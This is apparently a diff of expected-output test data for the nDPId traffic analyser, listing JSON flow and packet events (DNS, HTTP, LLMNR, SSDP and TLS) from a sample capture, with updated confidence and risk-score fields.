 00566{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":472,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104380737,"flow_last_seen":1470104380737,"flow_idle_time":180000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"ts_msec":1470104380737,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"8.8.8.8","src_port":54420,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":472,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":1,"flow_last_seen":1470104380737,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":75,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":75,"pkt_l4_len":41,"ts_msec":1470104380737,"pkt":"TF4M6gNlABxCjnAxCABFAAA9UhkAAIARpNbAqHMICAgICNSUADUAKZhJpTgBAAABAAAAAAAAAnZ2BXZpZGVvAnFxA2NvbQAAAQAB"}
-00722{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":472,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104380737,"flow_last_seen":1470104380737,"flow_idle_time":180000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"ts_msec":1470104380737,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"8.8.8.8","src_port":54420,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.QQ","breed":"Fun","category":"Chat"},"dns": {"query":"vv.video.qq.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00748{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":472,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104380737,"flow_last_seen":1470104380737,"flow_idle_time":180000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"ts_msec":1470104380737,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"8.8.8.8","src_port":54420,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.QQ","breed":"Fun","category":"Chat"},"dns": {"query":"vv.video.qq.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":473,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":2,"flow_last_seen":1470104380737,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":75,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":75,"pkt_l4_len":41,"ts_msec":1470104380737,"pkt":"TF4M6gNlABxCjnAxCABFAAA9UhkAAIARpNbAqHMICAgICNSUADUAKZhJpTgBAAABAAAAAAAAAnZ2BXZpZGVvAnFxA2NvbQAAAQAB"}
 00527{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":474,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":3,"flow_last_seen":1470104380772,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":116,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":116,"pkt_l4_len":82,"ts_msec":1470104380772,"pkt":"ABxCjnAxTF4M6gNlCABFAABmlL4AAC4RtAgICAgIwKhzCAA11JQAUqbTpTiBgAABAAIAAAAAAnZ2BXZpZGVvAnFxA2NvbQAAAQABwAwABQABAAABKwANCnByb3h5LXNldDHAD8AtAAEAAQAAASsABMvNl+o="}
-00739{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":474,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1470104380737,"flow_last_seen":1470104380772,"flow_idle_time":180000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":74,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":46,"midstream":0,"ts_msec":1470104380772,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"8.8.8.8","src_port":54420,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.QQ","breed":"Fun","category":"Chat"},"dns": {"query":"vv.video.qq.com","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"203.205.151.234"}}
+00765{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":474,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1470104380737,"flow_last_seen":1470104380772,"flow_idle_time":180000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":74,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":46,"midstream":0,"ts_msec":1470104380772,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"8.8.8.8","src_port":54420,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.QQ","breed":"Fun","category":"Chat"},"dns": {"query":"vv.video.qq.com","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"203.205.151.234"}}
 00571{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":475,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104380773,"flow_last_seen":1470104380773,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1470104380773,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"203.205.151.234","src_port":49608,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":475,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":1,"flow_last_seen":1470104380773,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1470104380773,"pkt":"TF4M6gNlABxCjnAxCABFAAA0UhtAAIAGEUDAqHMIy82X6sHIAFAfZnbXAAAAAIACIABgGQAAAgQE7AEDAwgBAQQC"}
 00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":476,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":2,"flow_last_seen":1470104380773,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1470104380773,"pkt":"TF4M6gNlABxCjnAxCABFAAA0UhtAAIAGEUDAqHMIy82X6sHIAFAfZnbXAAAAAIACIABgGQAAAgQE7AEDAwgBAQQC"}
 00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":477,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":3,"flow_last_seen":1470104380801,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1470104380801,"pkt":"ABxCjnAxTF4M6gNlCABFAAA0AABAADMGsFvLzZfqwKhzCABQwcglYwNrH2Z22IASFoBABAAAAgQFoAEBBAIBAwMK"}
-00730{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":480,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1470104380773,"flow_last_seen":1470104380807,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":204,"flow_tot_l4_payload_len":204,"flow_avg_l4_payload_len":34,"midstream":0,"ts_msec":1470104380807,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"203.205.151.234","src_port":49608,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP.QQ","breed":"Fun","category":"Chat"},"http": {"hostname":"vv.video.qq.com","url":"vv.video.qq.com\/getvinfo","code":0,"content_type":"","user_agent":"Mozilla\/5.0"}}
+00756{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":480,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1470104380773,"flow_last_seen":1470104380807,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":204,"flow_tot_l4_payload_len":204,"flow_avg_l4_payload_len":34,"midstream":0,"ts_msec":1470104380807,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"203.205.151.234","src_port":49608,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.QQ","breed":"Fun","category":"Chat"},"http": {"hostname":"vv.video.qq.com","url":"vv.video.qq.com\/getvinfo","code":0,"content_type":"","user_agent":"Mozilla\/5.0"}}
 00571{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":487,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104380890,"flow_last_seen":1470104380890,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1470104380890,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"42.120.51.152","src_port":49609,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":487,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":41,"flow_packet_id":1,"flow_last_seen":1470104380890,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1470104380890,"pkt":"TF4M6gNlABxCjnAxCABFAAA0Uh9AAIAGFuTAqHMIKngzmMHJH5CKzmkHAAAAAIACIADo5wAAAgQE7AEDAwgBAQQC"}
 00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":488,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":41,"flow_packet_id":2,"flow_last_seen":1470104380890,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1470104380890,"pkt":"TF4M6gNlABxCjnAxCABFAAA0Uh9AAIAGFuTAqHMIKngzmMHJH5CKzmkHAAAAAIACIADo5wAAAgQE7AEDAwgBAQQC"}
 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":489,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104380909,"flow_last_seen":1470104380909,"flow_idle_time":180000,"flow_min_l4_payload_len":317,"flow_max_l4_payload_len":317,"flow_tot_l4_payload_len":317,"flow_avg_l4_payload_len":317,"midstream":0,"ts_msec":1470104380909,"l3_proto":"ip4","src_ip":"192.168.10.110","dst_ip":"255.255.255.255","src_port":60480,"dst_port":62976,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00869{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":489,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":42,"flow_packet_id":1,"flow_last_seen":1470104380909,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":359,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":359,"pkt_l4_len":325,"ts_msec":1470104380909,"pkt":"\/\/\/\/\/\/\/\/XNmY3fXzCABFAAFZAABAAEARbn7AqApu\/\/\/\/\/+xA9gABRTgx\/\/8AAKAAXNmY3fXzwKgKbgAAAgAnAUROUy0xMTAwLTA0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABOQVMAAAAAAAAAAAAAVVqvihgAAABVWsE9WwAAAFVasDEuMDJiMTAAEXgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAXNmY3fXzM0ExAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGRsaW5rLURERjVGMwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADAqApu\/\/8AAExBTjEAAAAAAAAAAAAAAAAAAAAAAAAAAAA="}
 00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":492,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":41,"flow_packet_id":3,"flow_last_seen":1470104380966,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"ts_msec":1470104380966,"pkt":"ABxCjnAxTF4M6gNlCABFAAAwAABAADAGuQcqeDOYwKhzCB+QwcnDIL+ais5pCHASFtCCkgAAAgQFtAEBBAI="}
-00868{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":495,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1470104380890,"flow_last_seen":1470104380968,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":252,"flow_tot_l4_payload_len":252,"flow_avg_l4_payload_len":42,"midstream":0,"ts_msec":1470104380968,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"42.120.51.152","src_port":49609,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"42.120.51.152","url":"42.120.51.152:8080\/api\/proxy?url=http%3A%2F%2Fvv.video.qq.com%2Fgetvinfo","code":0,"content_type":"","user_agent":"Mozilla\/5.0"}}
+01057{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":495,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1470104380890,"flow_last_seen":1470104380968,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":252,"flow_tot_l4_payload_len":252,"flow_avg_l4_payload_len":42,"midstream":0,"ts_msec":1470104380968,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"42.120.51.152","src_port":49609,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"42.120.51.152","url":"42.120.51.152:8080\/api\/proxy?url=http%3A%2F%2Fvv.video.qq.com%2Fgetvinfo","code":0,"content_type":"","user_agent":"Mozilla\/5.0"}}
 00614{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":506,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":2,"flow_last_seen":1470104381115,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":175,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":175,"pkt_l4_len":141,"ts_msec":1470104381115,"pkt":"AQBef\/\/6\/PiuMpcsCABFAAChLEIAAAER2QjAqANf7\/\/\/+uhMB2wAjbUvTS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSG9zdDoyMzkuMjU1LjI1NS4yNTA6MTkwMA0KU1Q6dXJuOnNjaGVtYXMtdXBucC1vcmc6ZGV2aWNlOkludGVybmV0R2F0ZXdheURldmljZToxDQpNYW46InNzZHA6ZGlzY292ZXIiDQpNWDozDQoNCg=="}
 00571{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":507,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104381217,"flow_last_seen":1470104381217,"flow_idle_time":180000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"ts_msec":1470104381217,"l3_proto":"ip4","src_ip":"192.168.5.37","dst_ip":"224.0.0.252","src_port":56366,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":507,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":1,"flow_last_seen":1470104381217,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":68,"pkt_l4_len":34,"ts_msec":1470104381217,"pkt":"AQBeAAD8CJ4BzeuNCABFAAA2U68AAAERvz7AqAUl4AAA\/NwuFOsAIuU8ydMAAAABAAAAAAAACG5vdGVib29rAAD\/AAE="}
-00605{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":507,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104381217,"flow_last_seen":1470104381217,"flow_idle_time":180000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"ts_msec":1470104381217,"l3_proto":"ip4","src_ip":"192.168.5.37","dst_ip":"224.0.0.252","src_port":56366,"dst_port":5355,"l4_proto":"udp","ndpi": {"proto":"LLMNR","breed":"Acceptable","category":"Network"}}
+00631{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":507,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104381217,"flow_last_seen":1470104381217,"flow_idle_time":180000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"ts_msec":1470104381217,"l3_proto":"ip4","src_ip":"192.168.5.37","dst_ip":"224.0.0.252","src_port":56366,"dst_port":5355,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":508,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104381217,"flow_last_seen":1470104381217,"flow_idle_time":180000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":0,"ts_msec":1470104381217,"l3_proto":"ip4","src_ip":"192.168.5.37","dst_ip":"239.255.255.250","src_port":57325,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00614{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":508,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":44,"flow_packet_id":1,"flow_last_seen":1470104381217,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":175,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":175,"pkt_l4_len":141,"ts_msec":1470104381217,"pkt":"AQBef\/\/6CJ4BzeuNCABFAAChFE8AAAER7zXAqAUl7\/\/\/+t\/tB2wAjbvITS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSG9zdDoyMzkuMjU1LjI1NS4yNTA6MTkwMA0KU1Q6dXJuOnNjaGVtYXMtdXBucC1vcmc6ZGV2aWNlOkludGVybmV0R2F0ZXdheURldmljZToxDQpNYW46InNzZHA6ZGlzY292ZXIiDQpNWDozDQoNCg=="}
-00611{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":508,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104381217,"flow_last_seen":1470104381217,"flow_idle_time":180000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":0,"ts_msec":1470104381217,"l3_proto":"ip4","src_ip":"192.168.5.37","dst_ip":"239.255.255.250","src_port":57325,"dst_port":1900,"l4_proto":"udp","ndpi": {"proto":"SSDP","breed":"Acceptable","category":"System"}}
+00637{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":508,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104381217,"flow_last_seen":1470104381217,"flow_idle_time":180000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":0,"ts_msec":1470104381217,"l3_proto":"ip4","src_ip":"192.168.5.37","dst_ip":"239.255.255.250","src_port":57325,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}}
 00570{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":509,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104381237,"flow_last_seen":1470104381237,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1470104381237,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"192.168.115.75","src_port":53623,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":509,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":1,"flow_last_seen":1470104381237,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1470104381237,"pkt":"ABAj4ACgYMVHBbyMCABFAABAk\/BAAEAGrRvAqAUQwKhzS9F3AbseAeEVAAAAALAC\/\/84nQAAAgQFtAEDAwUBAQgKGg8YWwAAAAAEAgAA"}
 00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":510,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":2,"flow_last_seen":1470104381238,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1470104381238,"pkt":"ABxCjnAxABAj4ACgCABFAAA0AABAAEAGQRjAqHNLwKgFEAG70XdE8SFWHgHhFoASFtAl8wAAAgQFtAEBBAIBAwMH"}
 00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":511,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":3,"flow_last_seen":1470104381238,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"ts_msec":1470104381238,"pkt":"ABAj4ACgYMVHBbyMCABFAAAo9WxAAEAGS7fAqAUQwKhzS9F3AbseAeEWRPEhV1AQIABdlQAAcnZlcjBd"}
-00834{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":512,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1470104381237,"flow_last_seen":1470104381239,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":217,"flow_tot_l4_payload_len":217,"flow_avg_l4_payload_len":54,"midstream":0,"ts_msec":1470104381239,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"192.168.115.75","src_port":53623,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15":"TLS (probably) not carrying HTTPS"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"192.168.115.75","ja3":"799135475da362592a4be9199d258726","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
-00901{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":514,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1470104381237,"flow_last_seen":1470104381243,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":217,"flow_tot_l4_payload_len":378,"flow_avg_l4_payload_len":63,"midstream":0,"ts_msec":1470104381243,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"192.168.115.75","src_port":53623,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8":"Weak TLS cipher","15":"TLS (probably) not carrying HTTPS"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"192.168.115.75","ja3":"799135475da362592a4be9199d258726","ja3s":"573a9f3f80037fb40d481e2054def5bb","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA"}}
+00940{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":512,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1470104381237,"flow_last_seen":1470104381239,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":217,"flow_tot_l4_payload_len":217,"flow_avg_l4_payload_len":54,"midstream":0,"ts_msec":1470104381239,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"192.168.115.75","src_port":53623,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"192.168.115.75","ja3":"799135475da362592a4be9199d258726","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
+01088{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":514,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1470104381237,"flow_last_seen":1470104381243,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":217,"flow_tot_l4_payload_len":378,"flow_avg_l4_payload_len":63,"midstream":0,"ts_msec":1470104381243,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"192.168.115.75","src_port":53623,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"192.168.115.75","ja3":"799135475da362592a4be9199d258726","ja3s":"573a9f3f80037fb40d481e2054def5bb","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA"}}
 00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":539,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":2,"flow_last_seen":1470104381626,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":68,"pkt_l4_len":34,"ts_msec":1470104381626,"pkt":"AQBeAAD8CJ4BzeuNCABFAAA2U7AAAAERvz3AqAUl4AAA\/NwuFOsAIuU8ydMAAAABAAAAAAAACG5vdGVib29rAAD\/AAE="}
